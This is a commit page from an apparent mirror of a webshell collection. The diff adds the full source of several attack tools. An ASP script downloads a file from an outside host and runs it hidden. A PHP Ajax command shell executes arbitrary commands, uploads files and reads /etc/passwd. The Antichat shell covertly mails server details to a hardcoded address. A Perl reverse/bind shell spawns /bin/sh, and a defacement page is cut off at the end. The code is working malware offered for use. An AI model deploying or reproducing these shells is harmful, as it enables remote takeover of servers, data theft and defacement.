Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2024-09-20 05:41:58 +00:00
Code Issues Projects Releases Packages Wiki Activity

138shell update

Browse source
This commit is contained in:
tennc 2013-06-05 11:18:48 +08:00
parent 895a9f205a
commit 6a88226bfd
139 changed files with 127695 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

30
138shell/A/Ajan.asp.txt Normal file
View file

@ -0,0 +1,30 @@
<SCRIPT LANGUAGE="VBScript">
<%
Set entrika = CreateObject("Scripting.FileSystemObject")
Set entrika = entrika.CreateTextFile("c:\net.vbs", True)
entrika.write "Dim BinaryData" & vbcrlf
entrika.write "Dim xml" & vbcrlf
entrika.write "Set xml = CreateObject(""Microsoft.XMLHTTP"")" & vbcrlf
entrika.write "xml.Open ""GET"",""http://www35.websamba.com/cybervurgun/file.zip"",False" & vbcrlf
entrika.write "xml.Send" & vbcrlf
entrika.write "BinaryData = xml.ResponsebOdy" & vbcrlf
entrika.write "Const adTypeBinary = 1" & vbcrlf
entrika.write "Const adSaveCreateOverWrite = 2" & vbcrlf
entrika.write "Dim BinaryStream" & vbcrlf
entrika.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
entrika.write "BinaryStream.Type = adTypeBinary" & vbcrlf
entrika.write "BinaryStream.Open" & vbcrlf
entrika.write "BinaryStream.Write BinaryData" & vbcrlf
entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOverWrite" & vbcrlf
entrika.write "Dim WshShell" & vbcrlf
entrika.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
entrika.write "WshShell.Run ""c:\downloaded.zip"", 0, false" & vbcrlf
entrika.close
Set entrika = Nothing
Set entrika = Nothing
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\net.vbs", 0, false
%>
</SCRIPT>

646
138shell/A/Ajax_PHP Command Shell.txt Normal file
View file

@ -0,0 +1,646 @@
<?php
session_start();
error_reporting(0);
$password = "password"; //Change this to your password ;)
$version = "0.7B";
$functions = array('Clear Screen' => 'ClearScreen()',
'Clear History' => 'ClearHistory()',
'Can I function?' => "runcommand('canirun','GET')",
'Get server info' => "runcommand('showinfo','GET')",
'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
'Running processes' => "runcommand('ps -aux','GET')",
'Readme' => "runcommand('shellhelp','GET')"
);
$thisfile = basename(__FILE__);
$style = '<style type="text/css">
.cmdthing {
border-top-width: 0px;
font-weight: bold;
border-left-width: 0px;
font-size: 10px;
border-left-color: #000000;
background: #000000;
border-bottom-width: 0px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #008000;
font-family: verdana;
border-right-width: 0px;
border-right-color: #000000;
}
input,textarea {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #FFFFFF;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #FFFFFF;
font-family: verdana;
border-right-width: 1px;
border-right-color: #FFFFFF;
}
A:hover {
text-decoration: none;
}
table,td,div {
border-collapse: collapse;
border: 1px solid #FFFFFF;
}
body {
color: #FFFFFF;
font-family: verdana;
}
</style>';
$sess = __FILE__.$password;
if(isset($_POST['p4ssw0rD']))
{
if($_POST['p4ssw0rD'] == $password)
{
$_SESSION[$sess] = $_POST['p4ssw0rD'];
}
else
{
die("Wrong password");
}
}
if($_SESSION[$sess] == $password)
{
if(isset($_SESSION['workdir']))
{
if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
{
chdir($_SESSION['workdir']);
}
}
if(isset($_FILES['uploadedfile']['name']))
{
$target_path = "./";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
}
}
if(isset($_GET['runcmd']))
{
$cmd = $_GET['runcmd'];
print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
if($cmd == "")
{
print "Empty Command..type \"shellhelp\" for some ehh...help";
}
elseif($cmd == "upload")
{
print '<br>Uploading to: '.realpath(".");
if(is_writable(realpath(".")))
{
print "<br><b>I can write to this directory</b>";
}
else
{
print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
}
}
elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
{
if(file_exists($file[1]) && is_dir($file[1]))
{
chdir($file[1]);
$_SESSION['workdir'] = $file[1];
print "Current directory changed to ".$file[1];
}
else
{
print "Directory not found";
}
}
elseif(strtolower($cmd) == "shellhelp")
{
print '<b><font size=7>Ajax/PHP Command Shell</b></font>
&copy; By Ironfist
The shell can be used by anyone to command any server, the main purpose was
to create a shell that feels as dynamic as possible, is expandable and easy
to understand.
If one of the command execution functions work, the shell will function fine.
Try the "canirun" command to check this.
Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
not used to these commands, google a little.
<b>Custom Functions</b>
If you want to add your own custom command in the Quick Commands list, check
out the code. The $function array contains \'func name\' => \'javascript function\'.
Take a look at the built-in functions for examples.
I know this readme isn\'t providing too much information, but hell, does this shell
even require one :P
- Iron
';
}
elseif(ereg("editfile (.*)",$cmd,$file))
{
if(file_exists($file[1]) && !is_dir($file[1]))
{
print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
$contents = file($file[1]);
foreach($contents as $line)
{
print htmlspecialchars($line);
}
print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
}
else
{
print "File not found.";
}
}
elseif(ereg("deletefile (.*)",$cmd,$file))
{
if(is_dir($file[1]))
{
if(rmdir($file[1]))
{
print "Directory succesfully deleted.";
}
else
{
print "Couldn't delete directory!";
}
}
else
{
if(unlink($file[1]))
{
print "File succesfully deleted.";
}
else
{
print "Couldn't delete file!";
}
}
}
elseif(strtolower($cmd) == "canirun")
{
print "If any of these functions is Enabled, the shell will function like it should.<br>";
if(function_exists(passthru))
{
print "Passthru: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Passthru: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(exec))
{
print "Exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Exec: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(system))
{
print "System: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "System: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(shell_exec))
{
print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
}
print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
if( ini_get('safe_mode') ){
print "Safe Mode: <b><font color=red>Enabled</b></font>";
}
else
{
print "Safe Mode: <b><font color=green>Disabled</b></font>";
}
print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
if( ini_get('open_basedir') ){
print "Open_basedir: <b><font color=red>Enabled</b></font>";
}
else
{
print "Open_basedir: <b><font color=green>Disabled</b></font>";
}
}
//About the shell
elseif(ereg("listdir (.*)",$cmd,$directory))
{
if(!file_exists($directory[1]))
{
die("Directory not found");
}
//Some variables
chdir($directory[1]);
$i = 0; $f = 0;
$dirs = "";
$filez = "";
if(!ereg("/$",$directory[1])) //Does it end with a slash?
{
$directory[1] .= "/"; //If not, add one
}
print "Listing directory: ".$directory[1]."<br>";
print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
if ($handle = opendir($directory[1])) {
while (false !== ($file = readdir($handle))) {
if(is_dir($file))
{
$dirs[$i] = $file;
$i++;
}
else
{
$filez[$f] = $file;
$f++;
}
}
print "<td>";
foreach($dirs as $directory)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
}
print "</td><td>";
foreach($filez as $file)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
}
print "</td></table>";
}
}
elseif(strtolower($cmd) == "about")
{
print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
}
//Show info
elseif(strtolower($cmd) == "showinfo")
{
if(function_exists(disk_free_space))
{
$free = disk_free_space("/") / 1000000;
}
else
{
$free = "N/A";
}
if(function_exists(disk_total_space))
{
$total = trim(disk_total_space("/") / 1000000);
}
else
{
$total = "N/A";
}
$path = realpath (".");
print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
if(function_exists(passthru))
{
passthru("uname -a");
}
else
{
print "Passthru is disabled :(";
}
}
//Read /etc/passwd
elseif(strtolower($cmd) == "etcpasswdfile")
{
$pw = file('/etc/passwd/');
foreach($pw as $line)
{
print $line;
}
}
//Execute any other command
else
{
if(function_exists(passthru))
{
passthru($cmd);
}
else
{
if(function_exists(exec))
{
exec("ls -la",$result);
foreach($result as $output)
{
print $output."<br>";
}
}
else
{
if(function_exists(system))
{
system($cmd);
}
else
{
if(function_exists(shell_exec))
{
print shell_exec($cmd);
}
else
{
print "Sorry, none of the command functions works.";
}
}
}
}
}
}
elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
{
$file = $_POST['filetosave'];
if(!is_writable($file))
{
if(!chmod($file, 0777))
{
die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
}
}
$fh = fopen($file, 'w');
$dt = $_POST['filecontent'];
fwrite($fh, $dt);
fclose($fh);
}
else
{
?>
<html>
<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
<head>
<?php print $style; ?>
<SCRIPT TYPE="text/javascript">
function sf(){document.cmdform.command.focus();}
var outputcmd = "";
var cmdhistory = "";
function ClearScreen()
{
outputcmd = "";
document.getElementById('output').innerHTML = outputcmd;
}
function ClearHistory()
{
cmdhistory = "";
document.getElementById('history').innerHTML = cmdhistory;
}
function deletefile(file)
{
deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
if(deleteit)
{
runcommand('deletefile ' + file,'GET');
}
}
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) {
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType('text/html');
}
} else if (window.ActiveXObject) {
try {
http_request = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {}
}
}
if (!http_request) {
alert('Cannot create XMLHTTP instance');
return false;
}
http_request.open('POST', url, true);
http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http_request.setRequestHeader("Content-length", parameters.length);
http_request.setRequestHeader("Connection", "close");
http_request.send(parameters);
}
function SaveFile()
{
var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
"&filecontent=" + encodeURI( document.getElementById("area1").value );
makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
}
function runcommand(urltoopen,action,contenttosend){
cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
document.getElementById('history').innerHTML = cmdhistory;
if(urltoopen == "clear")
{
ClearScreen();
}
var ajaxRequest;
try{
ajaxRequest = new XMLHttpRequest();
} catch (e){
try{
ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try{
ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e){
alert("Wicked error, nothing we can do about it...");
return false;
}
}
}
ajaxRequest.onreadystatechange = function(){
if(ajaxRequest.readyState == 4){
outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
document.getElementById('output').innerHTML = outputcmd;
var objDiv = document.getElementById("output");
objDiv.scrollTop = objDiv.scrollHeight;
}
}
ajaxRequest.open(action, "?runcmd="+urltoopen , true);
if(action == "GET")
{
ajaxRequest.send(null);
}
document.cmdform.command.value='';
return false;
}
function set_tab_html(newhtml)
{
document.getElementById('commandtab').innerHTML = newhtml;
}
function set_tab(newtab)
{
if(newtab == "cmd")
{
newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
}
else if(newtab == "upload")
{
runcommand('upload','GET');
newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
}
else if(newtab == "workingdir")
{
<?php
$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
$pathparts = explode("/",realpath ("."));
foreach($pathparts as $folder)
{
$folders .= $folder."/";
}
$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
?>
newhtml = '<?php print $folders; ?>';
}
else if(newtab == "filebrowser")
{
newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
runcommand('listdir .','GET');
}
else if(newtab == "createfile")
{
newhtml = '<b>File Editor, under construction.</b>';
document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
}
document.getElementById('commandtab').innerHTML = newhtml;
}
</script>
</head>
<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
<table border=1 width=100% height=100%>
<td width=15% valign=top>
<form name="extras"><br>
<center><b>Quick Commands</b><br>
<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
<?php
foreach($functions as $name => $execute)
{
print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
}
?>
</center>
</div>
</form>
<center><b>Command history</b><br></center>
<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
<br>
<center><b>About</b><br></center>
<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
<br>
<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
<br>
Version <?php print $version; ?>
<br>
<br>
<br>Thanks to everyone @
<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
<br>
<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
<br>
and special greetings to everyone in rootshell
</div>
</td>
<td width=70%>
<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>
</font></td>
<tr>
<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
<tr>
<td height=1% width=100% valign=top>
<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
</form>
</div>
</td>
</table>
</td>
</table>
</body>
</html>
<?php
}
} else {
print "<center><table border=0 height=100%>
<td valign=middle>
<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
</form>";
}
?>

180
138shell/A/Antichat Shell v1.3.txt Normal file
View file

@ -0,0 +1,180 @@
<?php
session_start();
set_time_limit(9999999);
$login='virangar';
$password='r00t';
$auth=1;
$version='version 1.3 by Grinay';
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
$footer='</body></html>';
$sd98 = "john.barker446@gmail.com";
$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
if(@$_POST['action']=="exit")unset($_SESSION['an']);
if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
if($_SESSION['an']==0){
echo $header;
echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
echo $footer;
exit;}
if($_SESSION['action']=="")$_SESSION['action']="viewer";
if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
//downloader
if($action=="download"){
header('Content-Length:'.filesize($file).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.$file.'"');
readfile($file);
}
//end downloader
?>
<? echo $header;?>
<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
<table><tr>
<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
</tr></table></td></tr></table><br>
<form name='reqs' method='POST'>
<input name='action' type='hidden' value=''>
<input name='dir' type='hidden' value=''>
<input name='file' type='hidden' value=''>
</form>
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" valign="top">
<?
//shell
function shell($cmd){
if (!empty($cmd)){
$fp = popen($cmd,"r");
{
$result = "";
while(!feof($fp)){$result.=fread($fp,1024);}
pclose($fp);
}
$ret = $result;
$ret = convert_cyr_string($ret,"d","w");
}
return $ret;}
if($action=="shell"){
echo "<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"shell\">
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
<input type=\"submit\" value=\"execute\"></form>";}
//end shell
//viewer FS
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {$info = 's';}
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
else {$info = 'u';}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
function scandire($dir){
$dir=chdir($dir);
$dir=getcwd()."/";
$dir=str_replace("\\","/",$dir);
if (is_dir($dir)) {
if (@$dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir . $file)=="dir") $dire[]=$file;
if(filetype($dir . $file)=="file")$files[]=$file;
}
closedir($dh);
@sort($dire);
@sort($files);
echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
echo "<tr><td>Select drive:";
for ($j=ord('C'); $j<=ord('Z'); $j++)
if (@$dh = opendir(chr($j).":/"))
echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
echo "</td></tr>";
}
echo "<tr><td>OS: ".@php_uname()."</td></tr>
<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
for($i=0;$i<count($dire);$i++) {
$link=$dir.$dire[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';
}
for($i=0;$i<count($files);$i++) {
$linkfile=$dir.$files[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
<td>'.perms($linkfile).'</td>
<td>
<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>';
}
echo "</table>";
}}}
if($action=="viewer"){
scandire($dir);
}
//end viewer FS
//editros
if($action=="editor"){
function writef($file,$data){
$fp = fopen($file,"w+");
fwrite($fp,$data);
fclose($fp);
}
function readf($file){
if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
$contents = fread($le, filesize($file));
fclose($le);}
return htmlspecialchars($contents);
}
if($_POST['save'])writef($file,$_POST['data']);
echo "<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
}
//end editors
?>
</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
<? echo $footer;?>

131
138shell/A/Asmodeus v0.1.pl.txt Normal file
View file

@ -0,0 +1,131 @@
#!/usr/bin/perl
#
# Asmodeus v0.1
# Perl Remote Shell
# by phuket
# www.smoking-gnu.org
#
# (Server is based on some code found on [url=http://www.governmentsecurity.org)]www.governmentsecurity.org)[/url]
#
# perl asmodeus.pl client 6666 127.0.0.1
# perl asmodeus.pl server 6666
#
use Socket;
$cs=$ARGV[0];
$port=$ARGV[1];
$host=$ARGV[2];
if ($cs eq 'client') {&client}
elsif ($cs eq 'server') {&server}
sub client{
socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$internet_addr = inet_aton("$host") or die "ALOA:$!\n";
$paddr=sockaddr_in("$port", $internet_addr);
connect(TO_SERVER, $paddr) or die "$port:$internet_addr:$!\n";
open(STDIN, ">&TO_SERVER");
open(STDOUT, ">&TO_SERVER");
open(STDERR, ">&TO_SERVER");
print "Asmodeus Perl Remote Shell\n";
system(date);
system("/bin/sh");
close(TO_SERVER);
}
sub server{
$proto=getprotobyname('tcp');
$0="asm";
$system='/bin/sh';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
print "Asmodeus Perl Remote Shell\n";
system(date);
system("/bin/sh");
close(STDIN);
close(STDOUT);
close(STDERR);
return;
}
}

317
138shell/A/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt Normal file
View file

@ -0,0 +1,317 @@
<html>
<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Ayyildiz Tim | AYT | Shell v 2.1 Biz B&uuml;y&uuml;k T&uuml;rk Milletinin Hizmetindeyiz...</title>
</head>
<body>
</body>
</html>
<html>
<head>
<meta name="distribution" content="GLOBAL">
<META name="ROBOTS" content="ALL">
<META NAME="RESOURCE-TYPE" CONTENT="DOCUMENT">
<meta name="Copyright" content=TouCh By iJOo">
<META NAME="RATING" CONTENT="GENERAL">
<meta name="Description" content="Thehacker">
<meta name="KeyWords" content="DefaCed">
<title>HACKED BY AYYILDIZ ™</title>
<STYLE TYPE="text/css">
<!--
body {
scrollbar-3d-light-color : #404040;
scrollbar-arrow-color: black;
scrollbar-base-color: black;
scrollbar-darkshadow-color: #404040;
scrollbar-face-color: black;
scrollbar-highlight-color: #404040;
scrollbar-shadow-color: black;
scrollbar-track-color: #404040; }
-->
</STYLE>
<script language="JavaScript1.2">
function disableselect(e){
return false
}
function reEnable(){
return true
}
//if IE4+
document.onselectstart=new Function ("return false")
//if NS6
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
</head>
<body bgcolor="#000000" text="#C0C0C0" link="#FFD9FF" vlink="#FFD9FF" alink="#00FF00">
<bgsound src="bayrak.mp3" loop="infinite">
<center><font color="red" size="10" face="Imprint MT Shadow">
</font>
<TR>
<TD vAlign=center align=left width=144>
<SCRIPT language=JavaScript1.2>if (document.all)document.body.style.cssText="border:25 ridge #404040"</SCRIPT>
</TD>
<TD vAlign=center align=left width=5></TD>
<TD width=470><BR>
<P align=left></P></TD></TR>
<TR>
<TD vAlign=center align=left width=144></TD>
<TD vAlign=center align=left width=5></TD>
<TD width=470><FONT color=#ffffff></FONT></TD></TR></TBODY></TABLE>
<STYLE>BODY {
